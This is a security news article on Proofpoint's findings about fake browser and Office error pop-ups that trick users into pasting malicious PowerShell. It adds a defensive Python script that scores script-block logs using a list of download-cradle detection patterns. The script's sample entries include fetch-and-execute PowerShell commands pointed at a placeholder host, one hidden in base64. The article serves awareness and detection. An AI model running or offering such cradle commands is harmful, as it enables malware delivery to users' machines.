Researchers discover fake Chrome errors, tricking users into running malicious PowerShell scripts
Security researchers at cybersecurity firm Proofpoint have identified a new social engineering technique that tricks Google Chrome users into running PowerShell scripts and installing malware.
The researchers first observed this technique in the ClearFake campaign that ran last April. Where earlier ClearFake lures faked a browser update, this variant instead presents fake Google Chrome, Microsoft Word and Microsoft OneDrive error messages.
The scam works as follows. Users see a popup text box on their screen claiming that an error occurred when they tried to open a document or webpage. The popup then instructs them to "fix" the problem by copying a (malicious) script and pasting it into the Windows PowerShell terminal themselves.
Instead of resolving the problem, the script gives the threat actor a foothold and delivers malware such as DarkGate, Matanbuchus, NetSupport, Lumma Stealer and similar information stealers. Because the victim runs the script by hand, it bypasses controls that watch for browser downloads or macro-enabled documents. From one initial PowerShell script, five distinct malware families could be executed.
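Since the victim pastes the command themselves, the artefact that remains is the PowerShell command itself. The following script, added here as an illustration and not Proofpoint's detection logic or any vendor's code, triages PowerShell script-block log entries (Windows event 4104 style) for the download-cradle one-liners such lures rely on, including ones hidden behind an encoded command. The log line format, the sample entries, the indicator list and the weights are all constructed assumptions for this example, not real campaign data.

```python
"""Heuristic triage of PowerShell script-block log entries for pasted
download-cradle one-liners of the kind used in fake-error lures.
Added example, not Proofpoint's or any vendor's detection logic. The
log line format is constructed for the example, and the indicator
list and weights are assumptions, not tuned on real campaign data."""
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Each indicator: (case-insensitive regex, weight, label). Weights are assumed.
INDICATORS: List[Tuple[str, int, str]] = [
    (r"\b(?:iex|invoke-expression)\b", 3, "invoke-expression"),
    (r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", 3, "download cradle"),
    (r"\bnet\.webclient\b", 2, "webclient object"),
    (r"\bfrombase64string\b", 2, "inline base64 decode"),
    (r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", 2, "hidden window"),
    (r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b", 1, "execution policy bypass"),
    (r"https?://\S+", 1, "remote url"),
]
# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return '' if it is not."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return ""


def score_command(text: str) -> Tuple[int, List[str]]:
    """Score one command string; an encoded payload is decoded and scored as well."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            hits.append(label)
    m = ENCODED_ARG.search(text)
    if m:
        score += 3
        hits.append("encoded command")
        inner_score, inner_hits = score_command(decode_encoded_command(m.group(1)))
        score += inner_score
        hits.extend(f"decoded:{h}" for h in inner_hits)
    return score, hits


# Constructed log line layout for this example: "<event> host=<h> user=<u> ScriptBlockText=<text>".
LINE = re.compile(r"^(?P<event>\d+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+ScriptBlockText=(?P<text>.*)$")


def parse_line(line: str) -> Dict[str, str]:
    m = LINE.match(line)
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    return m.groupdict()


def triage(log: str, threshold: int = 5) -> List[Dict[str, object]]:
    """Return one finding per log line whose indicator score reaches the threshold."""
    findings = []
    for raw in log.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        score, hits = score_command(rec["text"])
        if score >= threshold:
            findings.append({"host": rec["host"], "user": rec["user"], "score": score, "hits": hits})
    return findings


# Constructed sample entries (not real campaign data). The encoded one is built
# here so the reader can see exactly what the base64 blob hides.
_HIDDEN = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_BLOB = base64.b64encode(_HIDDEN.encode("utf-16le")).decode("ascii")

SAMPLE_LOG = "\n".join([
    r"4104 host=WS01 user=alice ScriptBlockText=Get-ChildItem C:\Users\alice\Documents",
    "4104 host=WS01 user=alice ScriptBlockText=powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/fix.txt').Content\"",
    "4104 host=WS02 user=bob ScriptBlockText=Test-NetConnection -ComputerName fileserver -Port 445",
    f"4104 host=WS03 user=carol ScriptBlockText=powershell -nop -enc {ENCODED_BLOB}",
])

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The two benign lines score zero and the two cradles score well above the threshold; the encoded one is only caught because the blob is decoded and rescored, which is the check worth keeping in any real rule. Script-block logging (event 4104) has to be enabled for these entries to exist, and a scoring threshold like this should be tuned against an organisation's own administrative PowerShell before it is used to alert.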
Proofpoint researchers identified three of these attack chains. After ClearFake came the ClickFix campaign, which injected code into compromised websites to create an iframe that displayed another fake Google Chrome error.
Finally, the scammers launched an email-based infection chain that targeted thousands of organizations worldwide, using an HTML attachment that resembled a Microsoft Word document and asked users to install the 'Word Online' extension to view the document correctly. At the end of May, researchers saw the same scam being used to fake an error message from Microsoft's cloud storage service OneDrive.
One of the threat actors using this technique is TA571, a well-known spam distributor that sends large volumes of malware-laden email.
Proofpoint recommends that organizations train employees to recognise and report this kind of lure, in particular any web page or document that asks them to copy a command and run it themselves, to their security teams. "This is very specific training but can easily be integrated into an existing user training program," the cybersecurity firm concludes.